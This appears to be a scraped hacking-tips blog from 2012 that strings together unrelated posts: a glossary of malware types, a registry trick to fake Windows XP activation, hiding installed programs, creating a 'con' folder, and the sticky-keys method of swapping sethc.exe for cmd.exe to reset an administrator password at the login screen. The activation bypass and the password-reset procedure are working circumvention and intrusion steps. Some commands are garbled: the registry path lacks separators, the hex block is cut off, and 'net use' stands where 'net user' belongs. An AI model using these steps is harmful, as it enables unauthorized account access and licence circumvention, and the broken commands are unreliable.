Better known as Vital Information Resource Under Seize(VIRUS) is very first form of computer threat. They can replicate themselves and can also cause severe damage to data and information. They can hide themselves in other files and can also go in stealthy mode to avoid detection. Most of the times a VIRUS is a executable code.

Worms:

Worms are just capable of everything that a virus is capable of but its main feature is it can easily replicate itself on network and hence worm is also known as network worm. A worm is able to creep easily among systems as hence known as worm. A worm always needs a vector for creeping like email attachments, IM chat clients or IRC.

Trojan:

Trojan is a malicious program/code which is used for remote access to target computer and then attack using unauthorized access to target or victim's computer and causes damage to the system. Trojan is a small hidden code inside another program that's why it easily enters system without knowledge of computer user.

Spyware:

A spy ware is a piece of malicious code installed in system to monitor activities of person using the system. Basically idea of spyware also came from system monitoring tools.A spyware is capable of logging key strokes, also it can take screen shots and if you have Internet connection then it can even mail logs to specified email-address or transfer logs via ftp to designated location. Beyond just monitoring it can record your computing habits including which site you browse more, at what time you prefer to be on system or amount of time you spend on computer. A spyware can be used to track all information about your social-networking and IRC(Internet Relay Chat) Clients including all major and minor chat clients example: Google Talk, Rediff Messenger, Yahoo Messenger, Microsoft Live Chat absolutely every thing related to IRC client is exposed to spyware.

Backdoor:

Backdoors can be termed as a malicious code which gives access to an intruder to your system. A backdoor can provide partial or complete access to an attacker to your system. A backdoor can provide an attacker almost unlimited rights as an administrator and allow him/her to install applications and malicious code in your system. A backdoor is generally used to access system remotely and steal personal information including e-mail id' s, members information and credit card numbers.

Rootkit:

Root-Kit grants almost unlimited rights to attacker and attacker has full access to all hardware, software and services running on victim's system. An attacker can use Root-Kit to install backdoor or key logger on remote system. Root-Kit hides itself as system program and some times may not even appear in process lists.

Embedded Malicious Code:

As stated earlier a malware can be software or firmware, it must be clear a system hardware or a software might be already embedded with malicious code.

Crimeware:

They are malicious codes used for performing crimes related to computers. It may include use of one or more malware already available in list.

Make Your Windows XP Genuine

2012-01-23T09:34:00.000-08:00

You have a copy of Windows XP which several times pop up message about its activation, you don't have internet connection to activate your XP. So here's the trick that can help you get rid of this problem. Please note that this trick will only work on ordinary Windows XP SP1-SP2 installation that too before installing any other program on it i.e
your installation must be fresh to make this trick work out. Also it will not work on OEM version of Windows XP so if this trick doesn't work for you check your copy for OEM.

Method 1:

Open Notepad and copy following lines in it,

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion]
“CurrentBuild”=”1.511.1 () (Obsolete data – do not use)”
“ProductId”=”55274-640-1011873-23081″
“DigitalProductId”=hex:a4,00,00,00,03,00,00,00,35,35,32,37,34,2d,36,34,30,2d,
31,30,31,31,38,37,33,2d,32,33,30,38,31,00,2e,00,00,00,41,32,32,2d,30,30,30,

How To Hide An Installed Program In Windows

2012-01-23T09:33:00.002-08:00

In this post I will show you how you can hide an installed program from others in your system. I was in college when I created this trick to disallow my friends from playing games on my PC. I hope you 'll find this trick helpful. So, here's the trick,

First of all locate directory of installation from Program Files folder in C drive. For example you want to hide mozilla firefox installation from others then go to C:\Program Files\Mozilla Firefox folder and find firefox.exe. Once you get the main executable file, open notepad and type complete path of firefox.exe in it, for our example it will appear like this,

“C:\Program Files\Mozilla Firefox\firefox.exe”

should be with quotes otherwise it'll not work, now save this notepad file with whatever name you want with .cmd extention. For example I assume file is saved as fox.cmd . Now delete shortcuts for firefox from start menu, desktop and quick launch. Now open command prompt and change directory to Program Files and type following commands,

C:\Program Files>attrib /s /d /l +s +h +r "Mozilla Firefox"

You'll find Mozilla Firefox directory disappeared from Program Files. Now paste your fox.cmd file in C:\Windows\System32\ folder.

As you will remove all shortcuts to executable file there will be no link and as the directory is hidden using attrib command no one can see it. Now to run your program open command prompt and type fox or the name with which you saved .cmd file. Within seconds you will see firefox or hidden program popping out in new window. One of the advantages of this trick is that you'll be able to disallow people from using unwanted programs even though he/she will have admin privileges specially your family members and friends.

Please note that the hidden installed program will appear in add/remove program list but will be accessible to the person who knows name of .cmd file. Have fun.

Create Con Folder In Windows

2012-01-23T09:33:00.000-08:00

Now many times you might have heard we can't make con folder in windows. The reason is “con” name acts as system device for windows shell. Where “con” means “Console” that is your keyboard its not just con but there are some other names too that are disallowed to use as folder name since they also act as device name. For example,

com1 : communication port-1

com2: communication port-2

lpt1: line printer-1

lpt2: line printer-2

that means is it impossible to create folders with these names, the answer is names. If it was impossible then why the hell I am writing this post for. You can't create con folder using windows GUI by right clicking and adding new folder entry for this you have to use command prompt.

Open command prompt and type,

C:\>mkdir \\.\\c:\con

where c:\con should be full path to the location where you want to create con folder. Once created you'll not be able to delete this directory as you normally delete other directories. To delete it type whole command as it is as you typed to create it and then replace mkdir with rmdir.

In same way you can also create and delete other folder names which windows does not allow by default.

Sticky Key Method To Hack Windows Password

2012-01-23T09:32:00.000-08:00

This is one of the old tricks that was used to hack windows password, it works even today is big surprise. So lets see how this works.

Vulnerability:

When you press shift, alt or ctrl for more than 5 times windows opens sticky keys options for you. But this is not vulnerability, vulnerability is that it even works when you are on log-in screen. Our this hack uses this vulnerability to hack administrator password, works nearly in all versions of windows.

Procedure:

To make this work first of all take a bootable CD, Linux live CD can be preferred. Now browse through “C:\Windows\System32” folder and search for sethc.exe file, this is the file which is called when you press shift, alt or ctrl more than five times. Rename this file to anything and search for cmd.exe file, create its copy and rename that file to sethc.exe. Now reboot your system when your log-in screen will appear press shift key more than five times command prompt will open in front of you. Type following commands,

c:\>net user

It 'll show you number of users of that system watch for “administrator”. If it is not present there type following commands for each user

c:\>net user <username>

and check its “Local Group Membership” for administrator. Once found administrator type following commands,

c:\>net use {administrator/user with administrator privileges} 12345

Press enter now login to administrator account with password 12345. By using above command you'll reset password of administrator to 12345. You can use any password that comes to your mind. Please try this on your virtual system(for more info on virtual system read “Basic Lab Setup For Hacker”).

Counter Measure: Disable all sticky keys option, its just that simple.

Note: I know I started windows hacking phase without completing reconnaissance/footprinting. But I think you'll get bored if we will continue only reconnaissance because reconnaissance is completely passive phase so I thought its better to keep things interesting. We will cover reconnaissance and windows hacking in parallel. Don't forget to tell me your views about above hack. Thanks for reading and keep visiting.
